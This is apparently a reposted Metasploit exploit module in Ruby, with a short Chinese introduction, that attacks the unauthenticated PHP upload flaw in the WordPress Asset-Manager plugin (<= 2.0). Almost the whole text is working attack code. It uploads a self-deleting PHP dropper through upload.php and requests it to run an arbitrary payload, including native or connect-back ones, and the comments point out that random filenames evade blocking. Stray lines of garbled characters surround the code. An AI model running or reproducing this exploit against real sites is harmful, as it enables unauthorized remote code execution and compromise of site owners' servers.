这个模块利用 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞（已收录于 Metasploit 漏洞库）。插件的 upload.php 允许未经身份验证的用户将任意文件（包括 PHP 文件）上传到一个临时目录，随后直接请求该文件即可执行任意代码。
5 I: ?2 j% _* ?9 p
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
% }. P3 w. p5 @$ b; N $ Q) B5 b; y1 z3 n
require 'msf/core'
require 'msf/core/exploit/php_exe'
$ w" [. V% L1 c* l. s9 ]6 x! @
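# Unauthenticated PHP file upload in the WordPress Asset-Manager plugin (<= 2.0).
#
# The plugin ships an upload handler (upload.php) that stores whatever it receives
# in the "Filedata" multipart field under the site's uploads directory without any
# authentication or extension check. The module uploads a PHP dropper built by
# Msf::Exploit::PhpEXE and then requests it once to run the chosen payload.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Path of the vulnerable, unauthenticated upload handler, relative to the WordPress root.
  UPLOAD_HANDLER = 'wp-content/plugins/asset-manager/upload.php'
  # Directory upload.php drops files into, relative to the WordPress root. This assumes the
  # default WordPress uploads location; a site with a relocated uploads dir will 404 here.
  TEMP_DIR = 'wp-content/uploads/assets/temp/'

  # Module metadata and options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          # NUL would truncate the PHP source written by the dropper.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          # Native payload: the PHP dropper writes and executes an ELF binary.
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads the PHP dropper through upload.php and triggers it with a single GET.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload is not acknowledged
  #   or the dropper request returns an explicit non-200 status.
  def exploit
    # Build the base path without mutating the string target_uri hands back.
    base = target_uri.path
    base = "#{base}/" unless base.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Random, alpha-only name: avoids collisions between runs, gives defenders no fixed
    # filename to block, and is safe to match verbatim in the response below.
    payload_name = "#{rand_text_alpha(5)}.php"
    # Dropper that writes/executes the selected payload and deletes itself from disk.
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Multipart body with the single "Filedata" part the handler reads.
    mime = Rex::MIME::Message.new
    mime.add_part(php_payload, 'application/octet-stream', nil,
                  "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Rex prepends CRLF to the first boundary; strip it so the body starts cleanly.
    post_data = mime.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}#{UPLOAD_HANDLER}",
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => post_data
    })

    # A bare 200 is not proof of success (WordPress returns 200 for many error pages);
    # require the handler to echo the stored filename.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{base}#{TEMP_DIR}#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is acceptable here: a connect-back payload may never answer over HTTP.
    # Only an explicit non-200 (typically a 404 from a non-default uploads dir) is a failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end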
9 Y% [8 u9 ~/ F5 U$ x c |